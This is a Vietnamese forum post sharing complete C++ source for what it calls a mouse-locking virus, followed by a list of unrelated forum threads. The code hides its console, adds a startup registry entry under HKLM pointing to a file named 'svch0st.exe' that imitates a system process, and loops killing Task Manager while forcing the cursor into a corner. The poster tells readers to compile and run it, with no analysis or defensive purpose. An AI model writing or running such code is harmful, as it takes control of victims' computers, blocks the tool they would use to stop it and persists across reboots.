[Coding] Lập trình C++ - Code virus khóa chuột

ritter_bin

New member
virus-driver-razer-0909231.jpg


+++ Tớ phân ra 1 phần để post bài cho tiện, chứ thực ra đó là 1 file ... Các cậu copy chung về 1 file, biên dịch rùi chạy nhé

#include <windows.h>
#include <winbase.h>
#include <tlhelp32.h>
#include <ctype.h>
#include <string.h>

#define BUFSIZE 90

int test_key(void);
int create_key(char *);
int kill(void);

BOOL KillProcess(LPSTR lpszExecutable)
{
BOOL bResult = FALSE;
PROCESSENTRY32 pe32 = { sizeof(PROCESSENTRY32) };
HANDLE hProcess, hProcesses = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(Process32First(hProcesses, &pe32)){
do{
if(CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, pe32.szExeFile, -1, lpszExecutable, -1) == CSTR_EQUAL){
if((hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, pe32.th32ProcessID)) != NULL){
TerminateProcess(hProcess, 0); CloseHandle(hProcess); bResult = TRUE;
}
}
}while(Process32Next(hProcesses, &pe32));
CloseHandle(hProcesses);
}
return bResult;
}

int main(void)
{
int test,create;
test=test_key();

if (test==2)
{
char *path="c:\\WINDOWS\\svch0st.exe";
create=create_key(path);

}

HWND inv;
AllocConsole();
inv=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(inv,0);
int c;
for(c=0;c<999999999999;c++)
{
kill();
SetCursorPos(1,900);
Sleep(9);
}
}

int test_key(void)
{
int check;
HKEY hKey;
char path[BUFSIZE];
DWORD buf_length=BUFSIZE;
int reg_key;

reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
if(reg_key!=0)
{
check=1;
return check;
}

reg_key=RegQueryValueEx(hKey,"Windows Files",NULL,NULL,(LPBYTE)path,&buf_length);

if((reg_key!=0)||(buf_length>BUFSIZE))
check=2;
if(reg_key==0)
check=0;

RegCloseKey(hKey);
return check;
}

int create_key(char *path)
{
int reg_key,check;

HKEY hkey;

reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
if(reg_key==0)
{
RegSetValueEx((HKEY)hkey,"Windows files",0,REG_SZ,(BYTE *)path,strlen(path));
check=0;
return check;
}
if(reg_key!=0)
check=1;

return check;
}

int kill(void)
{
return KillProcess("taskmgr.exe");
}
:-kkk
 

Facebook Comment

Similar threads
Thread starter Tiêu đề Diễn đàn Trả lời Ngày
ritter_bin [Coding] Mã nguồn Cool Editor viết bằng Visual Basic 6 Mã nguồn mở 0
ritter_bin [Coding] Quản lý khách hàng VB.NET, mô hình 3 lớp với CSDL Access Mã nguồn mở 1
ritter_bin [Coding] Game Trúc Xanh viết bằng Visual Basic 6.0 Mã nguồn mở 0
ritter_bin [Coding] 14 hiệu ứng đẹp cho Form trong Visual Basic Mã nguồn mở 0
ritter_bin [Coding] Game Sudoku Player v2.0 viết bằng Visual Basic 6.0 Mã nguồn mở 0
ritter_bin [Coding] [PHP]WFilter 1.0 - Lọc List theo từ khoá .... Mã nguồn mở 0
ritter_bin [Coding] Sử dụng Photoshop Online ko cần cài đặt Mã nguồn mở 0
ritter_bin [Coding] Flash Page Flip PHP - Tạo Album online bằng flash Mã nguồn mở 1
ritter_bin [Coding] Rapidleech 45plugins (14-04-2009) Mã nguồn mở 0
ritter_bin [Coding] AutoBlogged v 2.4.22 WordPress AutoBlog Plugin Mã nguồn mở 0
ritter_bin [Coding] Blogs Automater tự động post bài qua RSS Mã nguồn mở 0
ritter_bin [Coding] 2 Code DOS viết bằng AutoIT Mã nguồn mở 0
ritter_bin [Coding] Treo nick yahoo 24/24 vẫn đọc đc tin nhắn Mã nguồn mở 0
ritter_bin [Coding] Dịch từ giống Google Translate (nhẹ, tiện) Mã nguồn mở 3
ritter_bin [Coding] Tạo chữ cho Teen Mã nguồn mở 0
ritter_bin [Coding] Site tạo hình avartar VIP! Mã nguồn mở 0
H Thiết kế cho lập trình VR CLB TIN HỌC 0
G Thành Lập Công Ty Tại Đà Nẵng, nên chọn đơn vị dịch vụ nào? Tin dịch vụ 0
H [Ký sự] Tuyển lập lờ, sinh viên chịu thiệt Viết về Đà Nẵng 7
T Mọi người ơi có ai muốn đi học lập trình không?????????????????????????????????? Góc lập trình 0
L [Nhà Đất] Dịch vụ thành lập doanh nghiệp QUẢNG CÁO - RAO VẶT 0
C ĐH có phải con đường duy nhất để trở thành lập trình viên Hỏi đáp Tin học 0
C [Du lịch] Lập đường dây nóng đối với các bãi tắm Đà Nẵng, giải quyết bức xúc cho du khách Tin tức 24h 0
C [Thế giới] Campuchia: biểu tình phản đối việc lãnh tụ phe đối lập vu khống Việt Nam Tin tức 24h 0
C [Giáo dục] Sẽ thành lập Đại học Việt - Anh tại Đà Nẵng Tin tức 24h 0
C [Đà Nẵng] Thành lập Nghiệp đoàn nghề cá đầu tiên của Đà Nẵng Tin tức 24h 0
C [Xã hội] Hot teen Đà Nẵng bị lập trang vạch trần sự thật Tin tức 24h 0
C [Đà Nẵng] Đà Nẵng: Thành lập trường ĐH về y dược Tin tức 24h 0
C [Đà Nẵng] Đà Nẵng: Lập trang thông tin điện tử UBND huyện Hoàng Sa Tin tức 24h 0
mulove “Thống đốc lập lại kỷ cương thôi” Tin tức 24h 0
C Nasdaq xác lập đỉnh cao 12 năm Chứng khoán Đà Nẵng 0
BNN [Thương hiệu] Xác lập thước đo của thương hiệu Chiến lược thương hiệu 0
BNN [Marketing] 7 bước lập một kế hoạch tiếp thị hoàn hảo Tổng quát thương hiệu 0
BNN [Thương hiệu] Chiến lược xây dựng thương hiệu cho doanh nghiệp mới lập Tổng quát thương hiệu 0
rcp [Công nghệ] “Ứng dụng triệu đô” của 2 nhà sáng lập gốc Việt sắp bị “khai tử” Tin tức 24h 1
D Học PHP như thế nào khi bạn chưa biết gì về lập trình ? Góc lập trình 0
R [Việc Làm] Nhận BC thuế,tháng,quý,năm,tư vấn thành lập DN,BCTC và Quyết toán miễn phí 2012 Giáo dục - Việc làm 13
T [Nhà Đất] Thẩm quyền ký, phê duyệt Thành lập Bệnh viện tư nhân 28/07/12 - 28/07/12 Website - Blog 0
BNN Đà Nẵng thành lập Chi cục Biển và Hải đảo Sóng BIỂN ĐÔNG 0
T [Đà Nẵng] Đà Nẵng sẽ ra Nghị quyết phản đối việc lập 'thành phố Tam Sa' Tin tức 24h 0
C TBN lập nên một loạt kỷ lục mới sau trận Chung kết Tin Thể thao 24h 0
BNN [Xã hội] Đà Nẵng lập đội chống chèo kéo du khách Tin tức 24h 0
mulove Yêu cầu Trung Quốc hủy quyết định lập 'thành phố Tam Sa' Sóng BIỂN ĐÔNG 1
S Công Ty Song Song Tuyển lập trình viên asp.net Giáo dục - Việc làm 2
M Tuyển nhân viên lập trình Giáo dục - Việc làm 8
Viết Sang Thiết lập thời gian biểu hợp lí. Nghệ thuật sống 1
N [Thế giới] 17 tuổi lập Website trị giá 50 triệu đô la. Tin tức 24h 1
K Tài liệu tiếng việt học lập trình JSP Java 1
BNN [Du lịch] Tô mì Quảng lập kỷ lục Việt Nam Tin tức 24h 8
BNN [Sức khỏe] Đà Nẵng thành lập Giải thưởng “Tỏa sáng Blouse trắng” Tin tức 24h 0

Similar threads

Top